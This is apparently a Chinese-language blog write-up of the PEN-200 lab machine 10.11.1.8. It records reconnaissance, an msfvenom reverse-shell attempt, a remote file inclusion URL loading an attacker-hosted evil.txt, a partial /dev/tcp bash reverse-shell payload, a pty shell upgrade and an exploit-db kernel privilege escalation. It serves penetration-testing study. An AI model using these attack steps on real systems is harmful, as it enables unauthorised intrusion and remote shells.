【pen200-lab】10.11.1.8
创始人
2024-03-18 07:34:15
0

pen200-lab 学习笔记

【pen200-lab】10.11.1.5


🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年12月4日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • pen200-lab 学习笔记
    • 信息收集
    • 21
    • 139
    • 3306
    • 80
    • 443
    • 631
    • 80
    • rfi
    • 建立一个稳定shell
    • 总结

信息收集

nmap -p- --min-rate 10000 -A  10.11.1.8
21/tcp   open   ftp         vsftpd 2.0.1
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open   ssh         OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open   http        Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
| http-robots.txt: 2 disallowed entries 
|_/internal/  /tmp/ 
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open   rpcbind     2 (RPC #100000)
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
443/tcp  open   ssl/https   Apache/2.0.52 (CentOS)
commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
445/tcp  open   netbios-ssn Samba smbd 3.0.33-0.17.el4 (workgroup: MYGROUP)
631/tcp  open   ipp         CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
868/tcp  closed unknown
3306/tcp open   mysql?

有用的信息筛选如上

21

登陆不上
咋样都不行
在这里插入图片描述

139

smbmap -H 10.11.1.5   

没有任何开放
在这里插入图片描述对445端口进行扫描依旧没有什么信息
在这里插入图片描述

3306

mysql -h 10.11.1.8 

测试一下登陆也是登陆不上的
在这里插入图片描述

80

gobuster dir -u http://10.11.1.8/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -t 100

首先爆破页面
得到了robots.txt
啥也没有

在这里插入图片描述还有一个评论页面

在这里插入图片描述在这里插入图片描述试了几个xss都不行

443

对https网站进行访问,发现是80页面的同站

在这里插入图片描述

631

对631cups1.1进行测试
谷歌上说他可能存在恶意的.so文件调用从而造成远程rce
我这样生成
可是不行

msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f elf-so > shell.so 

失败了,具体方法就不说了
只是分享我的思路

80

我思考了五分钟,我认为脆弱点应该还是在80页面上
我在源代码中发现了

var MooTools={version:"1.2.0",build:""}

但是谷歌上面几乎没有他的利用方法
紧接着我看到了他
我很好奇,这么多acs是啥

于是我连着搜索了一下
在这里插入图片描述这不就是那个论坛的标题么,我人傻了
我上一次离开那个论坛到现在花了三个小时

在这里插入图片描述其中基本上都是rce,lfi,rfi
其中rce以及lfi都不起作用

直到我开始尝试

rfi

在这里插入图片描述

http://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=http://10.11.0.222/evil.txt?

我可以包含远程的一个文本,从而执行其中的代码,而我决定将php代码放入其中
我首先需要在本地开启一个服务器
我想他最好是下面这样

& /dev/tcp/192.168.119.175/443 0>&1;");?>

在这里插入图片描述

建立一个稳定shell

python -c 'import pty; pty.spawn("/bin/sh")'

而后我会上传linpeas.sh
这就不说了,linux比windows好操作多了
在这里插入图片描述
漏洞建议这一块有问题,少命令

谷歌搜一下就能搜出来

Linux version 2.6.9-89.ELhttps://www.exploit-db.com/exploits/1397

用这个就行,直接给出了编译好的exp
上传赋权利用

在这里插入图片描述
剩下的就不说了

总结

很简单,但是我在一个智障点卡了三个小时
我服了

相关内容

热门资讯

原创 红... 当今国际局势愈发复杂,俄乌战场的战火依旧纷飞,近期红军城的激烈攻防战中,一则异常动向引发国际关注——...
多里安·芬尼-史密斯助阵火箭圣... 圣诞节总是NBA赛程中备受瞩目的日子,而今年的圣诞大战,休斯顿火箭队和洛杉矶湖人队的对决无疑成为了焦...
卧室门一关,湿被子一堵!七旬夫... 深夜熟睡中 刺鼻的浓烟突然涌入卧室 客厅已是一片火海 这样的绝境下 两位七旬老人居然可以冷静应对 成...
原创 新... 中期选举临近,共和党选票落后一大步,留给特朗普的时间已经不多了。谁料,对华关税井沦为“选举筹码”,那...
广州市委常委、常务副市长、黄埔... 12月26日,南方+客户端发布消息称,近日,广东省委决定:陈杰同志任江门市委委员、常委、书记;陈岸明...
施工栈桥未设安全围挡致汽车坠河... 极目新闻记者 邓波 据新华社报道,12月13日下午,位于广东江门鹤山市的南新高速西江特大桥施工栈桥发...
犇星新材闯关北交所!期内毛利率... 12月25日,湖北犇星新材料股份有限公司(简称“犇星新材”)在北交所披露招股书。 资料显示,犇星新材...
毕节首部营商环境法规即将实施 ... 12月25日,毕节市政府新闻办举行新闻发布会,对《毕节市优化营商环境条例》进行宣传解读。该《条例》是...
情侣海外旅行时当地“结婚”,婚... 一趟浪漫之旅,一纸境外婚书,让情侣二人归国后成为“已婚”人士。境外婚姻登记在国内“有效”吗?现双方产...
原创 没... 新账旧账一起算,高市早苗万万没有想到,经济受创的日本,如今又可能面临支付数亿元的账单。日韩之间的历史...